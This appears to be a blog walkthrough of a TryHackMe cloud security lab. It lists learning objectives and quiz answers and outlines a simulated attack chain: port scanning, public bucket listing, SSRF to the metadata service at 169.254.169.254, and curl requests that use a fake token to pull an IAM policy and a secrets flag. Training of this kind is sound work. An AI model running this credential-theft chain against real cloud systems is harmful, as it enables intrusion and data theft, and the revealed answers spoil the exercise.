June 13, 2026
Cloud Security Fundamentals | TryHackMe | practical lab
Learn cloud security fundamentals and walk a guided, cloud-agnostic attack chain end to end.
Jose Praveen
3 min read
This room will present the concepts in a cloud-agnostic way. Each task will introduce concepts using generic terms that convey the same general idea across different clouds. The flow will cover service deployment models, identity, storage, networking, and compute. You will also have a practical, hands-on exercise at the end in a simulated cloud environment that will walk you through port scanning, pivoting, SSRF chaining, and exfiltration.
Learning Objectives
- Explain the Shared Responsibility Model and map responsibilities across IaaS, PaaS, and SaaS
- Read an IAM policy, identify roles as the attackable primitive, and spot an over-permissive wildcard
- Recognize publicly exposed cloud storage and articulate how an attacker enumerates it
- Describe cloud networking primitives and common exposed-service and lateral-movement patterns
- Explain the Instance Metadata Service and the SSRF-to-credentials attack chain
- Walk a guided, cloud-agnostic attack against a simulated cloud environment
๐ ๏ธ Type: Walkthrough
๐ค Role: Cloud Security Analyst
๐ช Difficulty: Easy
๐Link : https://tryhackme.com/room/cloudsecurityfundamentals
A company runs its own web stack on a cloud virtual machine but does not manage the physical hardware. Which service model describes this arrangement?
IaaS
In the Shared Responsibility Model, who is always responsible for securing the physical datacentre and hardware?
Provider
In an IAM policy statement, which field states whether access is allowed or denied?
Effect
A named, temporary bundle of permissions that an identity can assume is called what?
Role
A bucket policy that sets "Principal": "*" effectively makes the bucket what? (one word, used throughout this task)
Public
From the list of artifacts worth prioritizing in an open bucket, which single type tends to hold the most sensitive data in one file?
Backups
In a security group rule, which CIDR notation indicates a port is open to the entire Internet?
0.0.0.0/0
What two-word term describes moving from one compromised instance to another reachable service inside the same virtual network using the same permissions?
Lateral movement
What is the link-local IP address AWS and Azure use for the Instance Metadata Service?
169.254.169.254
Which IMDS version responds to a plain HTTP GET with no session token, making it vulnerable to classic SSRF?
Practical, Attacking a Cloud-Like Environment
A fictional startup has left its staging environment exposed to the internet. In this task, we walk the attack chain end to end: we port-scan the instance, list a public bucket, pivot via SSRF to the metadata service, pull temporary credentials, read an overly permissive IAM policy, and retrieve the final flag. Every step uses nmap and curl on the AttackBox, no provider CLI required.
Run the port scan. Which port is the ImageFetcher web application running on?
The public bucket contains a file with hints about the next target. What is the filename?
Retrieve the IAM policy. What type of resource is the wildcard present in that provides full access?
curl -H "X-Simulated-Token: AKIATHM1234FAKEKEY0" http://MACHINE_IP:9000/admin/policy.jsoncurl -H "X-Simulated-Token: AKIATHM1234FAKEKEY0" http://MACHINE_IP:9000/admin/policy.json
Follow the policy to the flag. What is the flag value?
curl -H "X-Simulated-Token: AKIATHM1234FAKEKEY0" http://MACHINE_IP:9000/prod-secrets/flag.txtcurl -H "X-Simulated-Token: AKIATHM1234FAKEKEY0" http://MACHINE_IP:9000/prod-secrets/flag.txt
The cloud is a rented infrastructure. When we say a company "runs in the cloud", we mean they pay a provider (AWS, Azure, Google Cloud, or another) for compute, storage, and networking delivered through an API. Instead of buying servers and racking them in a room, the customer clicks a button and receives a virtual machine minutes later.